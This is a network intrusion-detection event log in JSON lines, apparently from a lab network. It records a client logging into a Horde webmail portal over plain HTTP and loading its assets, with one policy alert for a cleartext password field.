{"timestamp":"2020-02-29T00:24:56.412364+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60959,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":52542,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:24:56.520432+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60959,"proto":"UDP","dns":{"type":"answer","id":52542,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:24:56.520432+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60959,"proto":"UDP","dns":{"type":"answer","id":52542,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:24:56.531252+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012887,"rev":3,"signature":"ET POLICY Http Client Body contains pass= in cleartext","category":"Potential Corporate Privacy Violation","severity":1},"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20}} {"timestamp":"2020-02-29T00:24:56.531252+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20}} {"timestamp":"2020-02-29T00:24:56.531252+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":113,"tx_id":0}} {"timestamp":"2020-02-29T00:24:56.554604+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50033,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19211,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:24:56.663729+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50033,"proto":"UDP","dns":{"type":"answer","id":19211,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:24:56.663729+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50033,"proto":"UDP","dns":{"type":"answer","id":19211,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:24:56.845414+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50033,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19212,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:24:56.953878+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50033,"proto":"UDP","dns":{"type":"answer","id":19212,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:24:56.953878+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50033,"proto":"UDP","dns":{"type":"answer","id":19212,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:24:57.000273+0000","flow_id":1727159595722396,"event_type":"flow","src_ip":"192.168.10.122","src_port":51027,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:56.485020+0000","end":"2020-02-29T00:19:56.595891+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:57.177311+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8192}} {"timestamp":"2020-02-29T00:24:57.177971+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53120,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8192},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47189,"tx_id":1}} 
{"timestamp":"2020-02-29T00:24:57.181252+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":196}} {"timestamp":"2020-02-29T00:24:57.182655+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53124,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":201}} {"timestamp":"2020-02-29T00:24:57.183236+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53126,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119}} 
{"timestamp":"2020-02-29T00:24:57.184142+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131}} {"timestamp":"2020-02-29T00:24:57.185061+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":140}} {"timestamp":"2020-02-29T00:24:57.188596+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131},"app_proto":"http","fileinfo":{"filename":"\/turba\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":147,"tx_id":0}} 
{"timestamp":"2020-02-29T00:24:57.188909+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/js\/minisearch.js?v=bdffa700049748b9e0ede1748b17c142","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":569}} {"timestamp":"2020-02-29T00:24:57.190628+0000","flow_id":1124614358556355,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53130,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/date\/en-US.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2297}} {"timestamp":"2020-02-29T00:24:57.191480+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":196},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":315,"tx_id":0}} 
{"timestamp":"2020-02-29T00:24:57.189049+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53124,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":201},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":488,"tx_id":0}} {"timestamp":"2020-02-29T00:24:57.189253+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53126,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":199,"tx_id":0}} {"timestamp":"2020-02-29T00:24:57.189640+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53124,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/hordeblocks.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":306}} {"timestamp":"2020-02-29T00:24:57.189715+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53126,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/popup.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1110}} {"timestamp":"2020-02-29T00:24:57.191693+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53126,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/popup.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1110},"app_proto":"http","fileinfo":{"filename":"\/js\/popup.js","state":"CLOSED","stored":false,"size":2903,"tx_id":1}} {"timestamp":"2020-02-29T00:24:57.193072+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53126,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/growler.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2538}} {"timestamp":"2020-02-29T00:24:57.193016+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/tooltips.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":947}} {"timestamp":"2020-02-29T00:24:57.197940+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/js\/minisearch.js?v=bdffa700049748b9e0ede1748b17c142","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":569},"app_proto":"http","fileinfo":{"filename":"\/turba\/js\/minisearch.js","state":"CLOSED","stored":false,"size":1408,"tx_id":1}} {"timestamp":"2020-02-29T00:24:57.198362+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/tooltips.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":947},"app_proto":"http","fileinfo":{"filename":"\/js\/tooltips.js","state":"CLOSED","stored":false,"size":2555,"tx_id":1}} {"timestamp":"2020-02-29T00:24:57.194052+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53124,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/hordeblocks.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":306},"app_proto":"http","fileinfo":{"filename":"\/js\/hordeblocks.js","state":"CLOSED","stored":false,"size":528,"tx_id":1}} {"timestamp":"2020-02-29T00:24:57.194394+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53124,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/topbar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1180}} {"timestamp":"2020-02-29T00:24:57.199683+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53126,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/growler.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2538},"app_proto":"http","fileinfo":{"filename":"\/js\/growler.js","state":"CLOSED","stored":false,"size":8911,"tx_id":2}} {"timestamp":"2020-02-29T00:24:57.202349+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53120,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":140},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":222,"tx_id":2}} {"timestamp":"2020-02-29T00:24:57.235669+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/date\/date.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17641}} {"timestamp":"2020-02-29T00:24:57.236618+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/date\/date.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 
rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17641},"app_proto":"http","fileinfo":{"filename":"\/js\/date\/date.js","state":"CLOSED","stored":false,"size":85570,"tx_id":2}} {"timestamp":"2020-02-29T00:24:57.237983+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/head-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113}} {"timestamp":"2020-02-29T00:24:57.238364+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/head-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/head-bg.png","state":"CLOSED","stored":false,"size":113,"tx_id":3}} {"timestamp":"2020-02-29T00:24:57.238682+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2337}} {"timestamp":"2020-02-29T00:24:57.239649+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/effects.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8721}} {"timestamp":"2020-02-29T00:24:57.241182+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53126,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/sound.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":974}} {"timestamp":"2020-02-29T00:24:57.241917+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/effects.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8721},"app_proto":"http","fileinfo":{"filename":"\/js\/scriptaculous\/effects.js","state":"CLOSED","stored":false,"size":38450,"tx_id":2}} {"timestamp":"2020-02-29T00:24:57.245147+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/hordecore.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6117}} {"timestamp":"2020-02-29T00:24:57.244833+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2337},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/logo.png","state":"CLOSED","stored":false,"size":2337,"tx_id":4}} {"timestamp":"2020-02-29T00:24:57.248170+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 
rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":423}} {"timestamp":"2020-02-29T00:24:57.248640+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":423},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/settings.png","state":"CLOSED","stored":false,"size":423,"tx_id":5}} 